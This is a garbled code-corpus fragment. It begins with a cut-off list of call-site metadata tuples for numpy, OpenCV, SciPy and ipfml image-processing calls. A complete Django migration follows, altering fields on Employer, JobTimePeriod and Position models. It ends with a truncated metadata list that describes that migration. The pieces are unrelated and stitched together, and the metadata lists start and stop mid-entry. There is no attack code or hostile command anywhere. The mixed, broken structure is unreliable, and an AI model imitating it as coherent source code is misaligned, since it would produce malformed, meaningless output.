'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (10507, 10512), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10828, 10863), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (10847, 10863), False, 'from ipfml import utils\n'), ((11001, 11048), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (11035, 11048), False, 'from ipfml import utils\n'), ((11107, 11155), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (11142, 11155), False, 'from ipfml import utils\n'), ((11535, 11562), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.float32'], {}), '((3, 3), np.float32)\n', (11542, 11562), True, 'import numpy as np\n'), ((11585, 11614), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (11597, 11614), False, 'import cv2\n'), ((11632, 11659), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.float32'], {}), '((5, 5), np.float32)\n', (11639, 11659), True, 'import numpy as np\n'), ((11683, 11712), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (11695, 11712), False, 'import cv2\n'), ((11735, 11769), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(0.5)'], {}), '(arr, (3, 3), 0.5)\n', (11751, 11769), False, 'import cv2\n'), ((11794, 11826), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1)'], {}), '(arr, (3, 3), 1)\n', (11810, 11826), False, 'import cv2\n'), ((11851, 11885), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1.5)'], {}), '(arr, (3, 3), 1.5)\n', (11867, 11885), False, 'import cv2\n'), ((11910, 11944), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(0.5)'], {}), '(arr, (5, 5), 0.5)\n', (11926, 11944), False, 'import cv2\n'), ((11969, 12001), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1)'], {}), '(arr, (5, 5), 1)\n', (11985, 12001), False, 'import cv2\n'), ((12026, 12060), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1.5)'], {}), '(arr, (5, 5), 1.5)\n', (12042, 12060), False, 'import cv2\n'), ((12085, 12107), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (12094, 12107), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12132, 12154), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (12141, 12154), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12179, 12198), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (12185, 12198), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12223, 12242), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (12229, 12242), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12301, 12326), 'numpy.array', 'np.array', (['wave', '"""float64"""'], {}), "(wave, 'float64')\n", (12309, 12326), True, 'import numpy as np\n'), ((12559, 12585), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (12580, 12585), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((12901, 12936), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (12920, 12936), False, 'from ipfml import utils\n'), ((13074, 13121), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (13108, 13121), False, 'from ipfml import utils\n'), ((13180, 13228), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (13215, 13228), False, 'from ipfml import utils\n'), ((13481, 13508), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.float32'], {}), '((3, 3), np.float32)\n', (13488, 13508), True, 'import numpy as np\n'), ((13531, 13560), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (13543, 13560), False, 'import cv2\n'), ((13578, 13605), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.float32'], {}), '((5, 5), np.float32)\n', (13585, 13605), True, 'import numpy as np\n'), ((13629, 13658), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (13641, 13658), False, 'import cv2\n'), ((13681, 13715), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(0.5)'], {}), '(arr, (3, 3), 0.5)\n', (13697, 13715), False, 'import cv2\n'), ((13740, 13772), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1)'], {}), '(arr, (3, 3), 1)\n', (13756, 13772), False, 'import cv2\n'), ((13797, 13831), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1.5)'], {}), '(arr, (3, 3), 1.5)\n', (13813, 13831), False, 'import cv2\n'), ((13856, 13890), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(0.5)'], {}), '(arr, (5, 5), 0.5)\n', (13872, 13890), False, 'import cv2\n'), ((13915, 13947), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1)'], {}), '(arr, (5, 5), 1)\n', (13931, 13947), False, 'import cv2\n'), ((13972, 14006), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1.5)'], {}), '(arr, (5, 5), 1.5)\n', (13988, 14006), False, 'import cv2\n'), ((14031, 14053), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (14040, 14053), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14078, 14100), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (14087, 14100), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14125, 14144), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (14131, 14144), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14169, 14188), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (14175, 14188), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14247, 14272), 'numpy.array', 'np.array', (['wave', '"""float64"""'], {}), "(wave, 'float64')\n", (14255, 14272), True, 'import numpy as np\n'), ((14430, 14456), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (14451, 14456), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((14910, 14945), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (14929, 14945), False, 'from ipfml import utils\n'), ((15083, 15130), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (15117, 15130), False, 'from ipfml import utils\n'), ((15189, 15237), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (15224, 15237), False, 'from ipfml import utils\n'), ((15939, 15968), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['sub_zone'], {}), '(sub_zone)\n', (15958, 15968), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((15996, 16025), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['l_img'], {}), '(l_img)\n', (16018, 16025), False, 'from ipfml import utils\n'), ((16104, 16179), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.min_bilateral_diff', '(3, 3)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (3, 3))\n', (16129, 16179), False, 'from ipfml.filters import convolution, kernels\n'), ((16203, 16222), 'numpy.std', 'np.std', (['normed_diff'], {}), '(normed_diff)\n', (16209, 16222), True, 'import numpy as np\n'), ((16247, 16267), 'numpy.mean', 'np.mean', (['normed_diff'], {}), '(normed_diff)\n', (16254, 16267), True, 'import numpy as np\n'), ((16439, 16514), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.min_bilateral_diff', '(5, 5)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (5, 5))\n', (16464, 16514), False, 'from ipfml.filters import convolution, kernels\n'), ((16538, 16557), 'numpy.std', 'np.std', (['normed_diff'], {}), '(normed_diff)\n', (16544, 16557), True, 'import numpy as np\n'), ((16582, 16602), 'numpy.mean', 'np.mean', (['normed_diff'], {}), '(normed_diff)\n', (16589, 16602), True, 'import numpy as np\n'), ((16781, 16848), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_mean', '(3, 3)'], {}), '(normed_l_img, kernels.plane_mean, (3, 3))\n', (16806, 16848), False, 'from ipfml.filters import convolution, kernels\n'), ((16878, 16903), 'numpy.std', 'np.std', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (16884, 16903), True, 'import numpy as np\n'), ((16934, 16960), 'numpy.mean', 'np.mean', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (16941, 16960), True, 'import numpy as np\n'), ((17153, 17220), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_mean', '(5, 5)'], {}), '(normed_l_img, kernels.plane_mean, (5, 5))\n', (17178, 17220), False, 'from ipfml.filters import convolution, kernels\n'), ((17250, 17275), 'numpy.std', 'np.std', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (17256, 17275), True, 'import numpy as np\n'), ((17306, 17332), 'numpy.mean', 'np.mean', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (17313, 17332), True, 'import numpy as np\n'), ((17529, 17601), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_max_error', '(3, 3)'], {}), '(normed_l_img, kernels.plane_max_error, (3, 3))\n', (17554, 17601), False, 'from ipfml.filters import convolution, kernels\n'), ((17630, 17654), 'numpy.std', 'np.std', (['normed_plane_max'], {}), '(normed_plane_max)\n', (17636, 17654), True, 'import numpy as np\n'), ((17684, 17709), 'numpy.mean', 'np.mean', (['normed_plane_max'], {}), '(normed_plane_max)\n', (17691, 17709), True, 'import numpy as np\n'), ((17912, 17984), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_max_error', '(5, 5)'], {}), '(normed_l_img, kernels.plane_max_error, (5, 5))\n', (17937, 17984), False, 'from ipfml.filters import convolution, kernels\n'), ((18013, 18037), 'numpy.std', 'np.std', (['normed_plane_max'], {}), '(normed_plane_max)\n', (18019, 18037), True, 'import numpy as np\n'), ((18067, 18092), 'numpy.mean', 'np.mean', (['normed_plane_max'], {}), '(normed_plane_max)\n', (18074, 18092), True, 'import numpy as np\n'), ((22860, 22884), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (22881, 22884), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23176, 23200), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (23197, 23200), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23498, 23522), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (23519, 23522), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((24393, 24411), 'numpy.var', 'np.var', (['flat_coeff'], {}), '(flat_coeff)\n', (24399, 24411), True, 'import numpy as np\n'), ((3041, 3073), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (3066, 3073), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3147, 3166), 'numpy.mean', 'np.mean', (['l_svd_data'], {}), '(l_svd_data)\n', (3154, 3166), True, 'import numpy as np\n'), ((3192, 3213), 'numpy.median', 'np.median', (['l_svd_data'], {}), '(l_svd_data)\n', (3201, 3213), True, 'import numpy as np\n'), ((3239, 3268), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(25)'], {}), '(l_svd_data, 25)\n', (3252, 3268), True, 'import numpy as np\n'), ((3294, 3323), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(75)'], {}), '(l_svd_data, 75)\n', (3307, 3323), True, 'import numpy as np\n'), ((3349, 3367), 'numpy.var', 'np.var', (['l_svd_data'], {}), '(l_svd_data)\n', (3355, 3367), True, 'import numpy as np\n'), ((3992, 4024), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (4017, 4024), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((4098, 4117), 'numpy.mean', 'np.mean', (['l_svd_data'], {}), '(l_svd_data)\n', (4105, 4117), True, 'import numpy as np\n'), ((4143, 4164), 'numpy.median', 'np.median', (['l_svd_data'], {}), '(l_svd_data)\n', (4152, 4164), True, 'import numpy as np\n'), ((4190, 4219), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(25)'], {}), '(l_svd_data, 25)\n', (4203, 4219), True, 'import numpy as np\n'), ((4245, 4274), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(75)'], {}), '(l_svd_data, 75)\n', (4258, 4274), True, 'import numpy as np\n'), ((4300, 4318), 'numpy.var', 'np.var', (['l_svd_data'], {}), '(l_svd_data)\n', (4306, 4318), True, 'import numpy as np\n'), ((4814, 4846), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (4839, 4846), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5468, 5500), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (5493, 5500), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7072, 7091), 'numpy.array', 'np.array', (['sv_values'], {}), '(sv_values)\n', (7080, 7091), True, 'import numpy as np\n'), ((7094, 7117), 'numpy.array', 'np.array', (['ica_sv_values'], {}), '(ica_sv_values)\n', (7102, 7117), True, 'import numpy as np\n'), ((9581, 9603), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (9587, 9603), True, 'import numpy as np\n'), ((10890, 10912), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (10896, 10912), True, 'import numpy as np\n'), ((12963, 12985), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (12969, 12985), True, 'import numpy as np\n'), ((14516, 14561), 'ipfml.utils.get_entropy_contribution_of_i', 'utils.get_entropy_contribution_of_i', (['s', 'id_sv'], {}), '(s, id_sv)\n', (14551, 14561), False, 'from ipfml import utils\n'), ((14972, 14994), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (14978, 14994), True, 'import numpy as np\n'), ((20913, 20936), 'numpy.std', 'np.std', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (20919, 20936), True, 'import numpy as np\n'), ((20962, 20986), 'numpy.std', 'np.std', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (20968, 20986), True, 'import numpy as np\n'), ((21012, 21035), 'numpy.std', 'np.std', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (21018, 21035), True, 'import numpy as np\n'), ((21061, 21085), 'numpy.std', 'np.std', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (21067, 21085), True, 'import numpy as np\n'), ((21112, 21136), 'numpy.std', 'np.std', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (21118, 21136), True, 'import numpy as np\n'), ((21162, 21187), 'numpy.std', 'np.std', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (21168, 21187), True, 'import numpy as np\n'), ((21213, 21237), 'numpy.std', 'np.std', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (21219, 21237), True, 'import numpy as np\n'), ((21263, 21288), 'numpy.std', 'np.std', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (21269, 21288), True, 'import numpy as np\n'), ((21327, 21355), 'numpy.std', 'np.std', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (21333, 21355), True, 'import numpy as np\n'), ((21381, 21410), 'numpy.std', 'np.std', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (21387, 21410), True, 'import numpy as np\n'), ((21436, 21464), 'numpy.std', 'np.std', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (21442, 21464), True, 'import numpy as np\n'), ((21490, 21519), 'numpy.std', 'np.std', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (21496, 21519), True, 'import numpy as np\n'), ((21586, 21610), 'numpy.mean', 'np.mean', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (21593, 21610), True, 'import numpy as np\n'), ((21636, 21661), 'numpy.mean', 'np.mean', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (21643, 21661), True, 'import numpy as np\n'), ((21687, 21711), 'numpy.mean', 'np.mean', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (21694, 21711), True, 'import numpy as np\n'), ((21737, 21762), 'numpy.mean', 'np.mean', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (21744, 21762), True, 'import numpy as np\n'), ((21789, 21814), 'numpy.mean', 'np.mean', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (21796, 21814), True, 'import numpy as np\n'), ((21840, 21866), 'numpy.mean', 'np.mean', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (21847, 21866), True, 'import numpy as np\n'), ((21892, 21917), 'numpy.mean', 'np.mean', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (21899, 21917), True, 'import numpy as np\n'), ((21943, 21969), 'numpy.mean', 'np.mean', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (21950, 21969), True, 'import numpy as np\n'), ((22008, 22037), 'numpy.mean', 'np.mean', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (22015, 22037), True, 'import numpy as np\n'), ((22063, 22093), 'numpy.mean', 'np.mean', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (22070, 22093), True, 'import numpy as np\n'), ((22119, 22148), 'numpy.mean', 'np.mean', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (22126, 22148), True, 'import numpy as np\n'), ((22174, 22204), 'numpy.mean', 'np.mean', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (22181, 22204), True, 'import numpy as np\n'), ((22911, 22932), 'ipfml.utils.get_entropy', 'utils.get_entropy', (['sv'], {}), '(sv)\n', (22928, 22932), False, 'from ipfml import utils\n'), ((23227, 23248), 'ipfml.utils.get_entropy', 'utils.get_entropy', (['sv'], {}), '(sv)\n', (23244, 23248), False, 'from ipfml import utils\n')] |
# Generated by Django 2.2.4 on 2019-08-04 21:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('jobHistory', '0002_auto_20190106_0202'),
]
operations = [
migrations.AlterField(
model_name='employer',
name='city',
field=models.CharField(blank=True, max_length=200, verbose_name='City'),
),
migrations.AlterField(
model_name='employer',
name='country',
field=models.CharField(blank=True, max_length=200, verbose_name='Country'),
),
migrations.AlterField(
model_name='employer',
name='county_or_parish',
field=models.CharField(blank=True, max_length=200, verbose_name='County or Parish'),
),
migrations.AlterField(
model_name='employer',
name='email',
field=models.EmailField(blank=True, max_length=254, verbose_name='Email'),
),
migrations.AlterField(
model_name='employer',
name='industry',
field=models.CharField(blank=True, max_length=254, verbose_name='Industry'),
),
migrations.AlterField(
model_name='employer',
name='long_name',
field=models.CharField(max_length=254, null=True, unique=True, verbose_name='Long Name'),
),
migrations.AlterField(
model_name='employer',
name='phone',
field=models.CharField(blank=True, max_length=50, verbose_name='Phone'),
),
migrations.AlterField(
model_name='employer',
name='short_name',
field=models.CharField(max_length=50, unique=True, verbose_name='Short Name'),
),
migrations.AlterField(
model_name='employer',
name='state_or_province',
field=models.CharField(blank=True, max_length=200, verbose_name='State or Province'),
),
migrations.AlterField(
model_name='employer',
name='zip_or_postal_code',
field=models.CharField(blank=True, max_length=50, verbose_name='Zip Code or Postal Code'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='contributions_and_accomplishments',
field=models.TextField(blank=True, verbose_name='Contributions and Accomplishments'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='end_day',
field=models.PositiveSmallIntegerField(null=True, verbose_name='End Day'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='end_month',
field=models.PositiveSmallIntegerField(null=True, verbose_name='End Month'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='end_year',
field=models.PositiveIntegerField(null=True, verbose_name='End Year'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='ending_pay',
field=models.CharField(max_length=50, verbose_name='Ending Pay'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='hours_per_week',
field=models.PositiveSmallIntegerField(null=True, verbose_name='Hours per Week'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='is_current_position',
field=models.BooleanField(default=True, verbose_name='Current Position?'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='position',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='jobHistory.Position', verbose_name='Position'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='start_day',
field=models.PositiveSmallIntegerField(null=True, verbose_name='Start Day'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='start_month',
field=models.PositiveSmallIntegerField(null=True, verbose_name='Start Month'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='start_year',
field=models.PositiveIntegerField(verbose_name='Start Year'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='starting_pay',
field=models.CharField(max_length=50, verbose_name='Starting Pay'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='work_city',
field=models.CharField(blank=True, max_length=200, verbose_name='Work City'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='work_country',
field=models.CharField(blank=True, max_length=200, verbose_name='Work Country'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='work_county_or_parish',
field=models.CharField(blank=True, max_length=200, verbose_name='Work County or Parish'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='work_state_or_province',
field=models.CharField(blank=True, max_length=200, verbose_name='Work State or Province'),
),
migrations.AlterField(
model_name='jobtimeperiod',
name='work_zip_or_postal_code',
field=models.CharField(blank=True, max_length=50, verbose_name='Work Zip Code or Postal Code'),
),
migrations.AlterField(
model_name='position',
name='can_contact',
field=models.BooleanField(verbose_name='Can Contact?'),
),
migrations.AlterField(
model_name='position',
name='contributions_and_accomplishments',
field=models.TextField(blank=True, verbose_name='Contributions and Accomplishments'),
),
migrations.AlterField(
model_name='position',
name='employer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='jobHistory.Employer', verbose_name='Employer'),
),
migrations.AlterField(
model_name='position',
name='responsibilities',
field=models.TextField(blank=True, verbose_name='Responsibilities'),
),
migrations.AlterField(
model_name='position',
name='supervisor_city',
field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor City'),
),
migrations.AlterField(
model_name='position',
name='supervisor_country',
field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor Country'),
),
migrations.AlterField(
model_name='position',
name='supervisor_county_or_parish',
field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor County or Parish'),
),
migrations.AlterField(
model_name='position',
name='supervisor_email',
field=models.EmailField(blank=True, max_length=254, verbose_name='Supervisor Email'),
),
migrations.AlterField(
model_name='position',
name='supervisor_given_name',
field=models.CharField(max_length=200, verbose_name='Supervisor Given Name'),
),
migrations.AlterField(
model_name='position',
name='supervisor_middle_name',
field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor Middle Name'),
),
migrations.AlterField(
model_name='position',
name='supervisor_name_prefix',
field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Name Prefix'),
),
migrations.AlterField(
model_name='position',
name='supervisor_name_suffix',
field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Name Suffix'),
),
migrations.AlterField(
model_name='position',
name='supervisor_phone',
field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Phone'),
),
migrations.AlterField(
model_name='position',
name='supervisor_state_or_province',
field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor State or Province'),
),
migrations.AlterField(
model_name='position',
name='supervisor_surname',
field=models.CharField(max_length=200, verbose_name='Supervisor Surname'),
),
migrations.AlterField(
model_name='position',
name='supervisor_zip_or_postal_code',
field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Zip Code or Postal Code'),
),
migrations.AlterField(
model_name='position',
name='title',
field=models.CharField(max_length=200, verbose_name='Title'),
),
]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.PositiveIntegerField",
"django.db.models.PositiveSmallIntegerField",
"django.db.models.CharField"
] | [((372, 437), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""City"""'}), "(blank=True, max_length=200, verbose_name='City')\n", (388, 437), False, 'from django.db import migrations, models\n'), ((562, 630), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Country"""'}), "(blank=True, max_length=200, verbose_name='Country')\n", (578, 630), False, 'from django.db import migrations, models\n'), ((764, 841), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""County or Parish"""'}), "(blank=True, max_length=200, verbose_name='County or Parish')\n", (780, 841), False, 'from django.db import migrations, models\n'), ((964, 1031), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=254, verbose_name='Email')\n", (981, 1031), False, 'from django.db import migrations, models\n'), ((1157, 1226), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Industry"""'}), "(blank=True, max_length=254, verbose_name='Industry')\n", (1173, 1226), False, 'from django.db import migrations, models\n'), ((1353, 1440), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(254)', 'null': '(True)', 'unique': '(True)', 'verbose_name': '"""Long Name"""'}), "(max_length=254, null=True, unique=True, verbose_name=\n 'Long Name')\n", (1369, 1440), False, 'from django.db import migrations, models\n'), ((1558, 1623), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Phone"""'}), "(blank=True, max_length=50, verbose_name='Phone')\n", (1574, 1623), False, 'from django.db import migrations, models\n'), ((1751, 1822), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'unique': '(True)', 'verbose_name': '"""Short Name"""'}), "(max_length=50, unique=True, verbose_name='Short Name')\n", (1767, 1822), False, 'from django.db import migrations, models\n'), ((1957, 2035), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""State or Province"""'}), "(blank=True, max_length=200, verbose_name='State or Province')\n", (1973, 2035), False, 'from django.db import migrations, models\n'), ((2171, 2259), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Zip Code or Postal Code')\n", (2187, 2259), False, 'from django.db import migrations, models\n'), ((2410, 2488), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Contributions and Accomplishments"""'}), "(blank=True, verbose_name='Contributions and Accomplishments')\n", (2426, 2488), False, 'from django.db import migrations, models\n'), ((2618, 2685), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Day"""'}), "(null=True, verbose_name='End Day')\n", (2650, 2685), False, 'from django.db import migrations, models\n'), ((2817, 2886), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Month"""'}), "(null=True, verbose_name='End Month')\n", (2849, 2886), False, 'from django.db import migrations, models\n'), ((3017, 3080), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Year"""'}), "(null=True, verbose_name='End Year')\n", (3044, 3080), False, 'from django.db import migrations, models\n'), ((3213, 3271), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'verbose_name': '"""Ending Pay"""'}), "(max_length=50, verbose_name='Ending Pay')\n", (3229, 3271), False, 'from django.db import migrations, models\n'), ((3408, 3482), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Hours per Week"""'}), 